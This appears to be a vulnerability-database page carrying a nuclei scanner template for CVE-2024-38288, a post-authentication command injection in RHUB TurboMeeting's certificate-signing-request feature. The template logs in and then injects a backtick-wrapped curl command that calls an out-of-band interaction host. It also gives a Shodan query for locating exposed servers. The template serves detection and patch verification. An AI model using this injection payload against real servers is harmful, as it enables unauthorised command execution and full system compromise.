Lucene search
K

TurboMeeting - Post-Authentication Command Injection

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 31 Views

The TurboMeeting admin portal is vulnerable to post-authentication command injection through the Certificate Signing Request (CSR) feature allowing arbitrary command execution

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-38288
25 Jul 202422:46
circl
CNNVD
RHUB TurboMeeting 安全漏洞
25 Jul 202400:00
cnnvd
CVE
CVE-2024-38288
25 Jul 202400:00
cve
Cvelist
CVE-2024-38288
25 Jul 202400:00
cvelist
NVD
CVE-2024-38288
25 Jul 202420:15
nvd
OSV
CVE-2024-38288
25 Jul 202420:15
osv
Positive Technologies
PT-2024-27926 · R Hub · R-Hub Turbomeeting
25 Jul 202400:00
ptsecurity
RedhatCVE
CVE-2024-38288
23 May 202507:45
redhatcve
Vulnrichment
CVE-2024-38288
25 Jul 202400:00
vulnrichment
id: CVE-2024-38288

info:
  name: TurboMeeting - Post-Authentication Command Injection
  author: rootxharsh,iamnoooob,pdresearch
  severity: high
  description: |
    The Certificate Signing Request (CSR) feature in the admin portal of the application is vulnerable to command injection. This vulnerability could allow authenticated admin users to execute arbitrary commands on the underlying server by injecting malicious input into the CSR generation process. The application failed to properly sanitize user-supplied input before using it in a command executed privileges.
  impact: |
    Authenticated admin users can execute arbitrary OS commands on the TurboMeeting server through malicious CSR input, leading to complete system compromise and potential access to all meeting data.
  remediation: |
    Upgrade to the latest patched version of RHUB TurboMeeting or apply vendor-provided security updates.
  reference:
    - https://github.com/google/security-research/security/advisories/GHSA-gx6g-8mvx-3q5c
    - https://www.rhubcom.com/v5/manuals.html
  classification:
    epss-score: 0.03216
    epss-percentile: 0.86669
    cpe: cpe:2.3:a:rhubcom:turbomeeting:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    shodan-query: html:"TurboMeeting"
    product: turbomeeting
    vendor: rhubcom
  tags: cve,cve2024,rce,turbomeeting,authenticated,vuln

variables:
  username: "{{username}}"
  password: "{{password}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /as/wapi/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        next_path=%2Fas%2Fwapi%2Fprofile_entry&Email={{username}}&Password={{password}}&submit=Login

    matchers:
      - type: word
        part: body
        words:
          - "as/wapi/profile_entry?sid="
        internal: true

    extractors:
      - type: regex
        name: sid
        part: body
        group: 1
        regex:
          - 'sid=(.*?)"'
        internal: true

  - raw:
      - |
        @timeout: 20s
        POST /as/wapi/generate_csr HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        sid={{sid}}&common_name=1"%20out%20/dev/null"`curl%20{{interactsh-url}}`&company_name=1&state=1&city=1&country=US&submit=Generate+CSR

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - CSR
          - SSL
        condition: and

      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "dns"
# digest: 490a0046304402207ed89b5750280b01009134141f1f557c6db6517449981e80c2ed88fc4689a47c0220145080e7aceb418958555b4dc5816b027ba767d8e6115c16f62d43359899d1e7:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.2Medium risk
Vulners AI Score6.2
CVSS 3.17.2
EPSS0.03216
SSVC
31